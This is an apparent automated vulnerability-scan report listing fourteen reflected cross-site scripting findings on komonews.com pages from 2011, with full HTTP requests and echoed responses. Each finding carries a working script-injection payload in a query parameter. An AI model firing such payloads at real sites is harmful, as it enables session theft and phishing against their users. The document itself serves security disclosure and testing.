komo.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

1.1. http://www.komonews.com/home/video/116474128.html [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/home/video/116474128.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e08"><script>alert(1)</script>034151ed390 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116474128.html?60e08"><script>alert(1)</script>034151ed390=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Pizza work
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116474128.html?60e08"><script>alert(1)</script>034151ed390=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.2. http://www.komonews.com/home/video/116545678.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/home/video/116545678.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e617"><script>alert(1)</script>b9f69a85e49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116545678.html?8e617"><script>alert(1)</script>b9f69a85e49=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52532

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Popsicle b
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116545678.html?8e617"><script>alert(1)</script>b9f69a85e49=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.3. http://www.komonews.com/home/video/116673784.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/home/video/116673784.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de53e"><script>alert(1)</script>dab5cd8a77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116673784.html?de53e"><script>alert(1)</script>dab5cd8a77e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Dog food d
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116673784.html?de53e"><script>alert(1)</script>dab5cd8a77e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.4. http://www.komonews.com/home/video/116675584.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/home/video/116675584.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de34b"><script>alert(1)</script>27421b48bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116675584.html?de34b"><script>alert(1)</script>27421b48bf6=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   All aboard
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116675584.html?de34b"><script>alert(1)</script>27421b48bf6=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.5. http://www.komonews.com/home/video/116675749.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/home/video/116675749.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28363"><script>alert(1)</script>99e6cbbb627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116675749.html?28363"><script>alert(1)</script>99e6cbbb627=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Cameras ca
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116675749.html?28363"><script>alert(1)</script>99e6cbbb627=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.6. http://www.komonews.com/home/video/116702184.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/home/video/116702184.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c0c"><script>alert(1)</script>f487fe8b3fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/video/116702184.html?d0c0c"><script>alert(1)</script>f487fe8b3fa=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 52498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Eric's Lit
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116702184.html?d0c0c"><script>alert(1)</script>f487fe8b3fa=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.7. http://www.komonews.com/news/116650859.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116650859.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396b3"><script>alert(1)</script>40d72bcd3cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116650859.html?396b3"><script>alert(1)</script>40d72bcd3cc=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Seattle co
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116650859.html?396b3"><script>alert(1)</script>40d72bcd3cc=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.8. http://www.komonews.com/news/116650859.html [skipthumb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116650859.html

Issue detail

The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c42"><script>alert(1)</script>c1b448bc43d was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116650859.html?skipthumb=Y38c42"><script>alert(1)</script>c1b448bc43d HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Seattle co
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116650859.html?skipthumb=Y38c42"><script>alert(1)</script>c1b448bc43d" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.9. http://www.komonews.com/news/116652534.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116652534.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d385"><script>alert(1)</script>c66634aa9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116652534.html?7d385"><script>alert(1)</script>c66634aa9ad=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 62451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   An appetiz
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116652534.html?7d385"><script>alert(1)</script>c66634aa9ad=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.10. http://www.komonews.com/news/116694569.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116694569.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b98"><script>alert(1)</script>98d22e6ce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116694569.html?59b98"><script>alert(1)</script>98d22e6ce5=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 62501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Winter Sto
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694569.html?59b98"><script>alert(1)</script>98d22e6ce5=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.11. http://www.komonews.com/news/116694569.html [skipthumb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116694569.html

Issue detail

The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5bc"><script>alert(1)</script>3578d8357a5 was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116694569.html?skipthumb=Yca5bc"><script>alert(1)</script>3578d8357a5 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 62511

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Winter Sto
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694569.html?skipthumb=Yca5bc"><script>alert(1)</script>3578d8357a5" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.12. http://www.komonews.com/news/116694614.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116694614.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb865"><script>alert(1)</script>0db0d2d78f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116694614.html?bb865"><script>alert(1)</script>0db0d2d78f9=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Police off
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116694614.html?bb865"><script>alert(1)</script>0db0d2d78f9=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.13. http://www.komonews.com/news/116707379.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116707379.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 250e3"><script>alert(1)</script>284a71de2fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116707379.html?250e3"><script>alert(1)</script>284a71de2fb=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 61086

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Tuba Man k
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116707379.html?250e3"><script>alert(1)</script>284a71de2fb=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.14. http://www.komonews.com/news/116727124.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/116727124.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7249e"><script>alert(1)</script>3476c1f423c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/116727124.html?7249e"><script>alert(1)</script>3476c1f423c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 63420

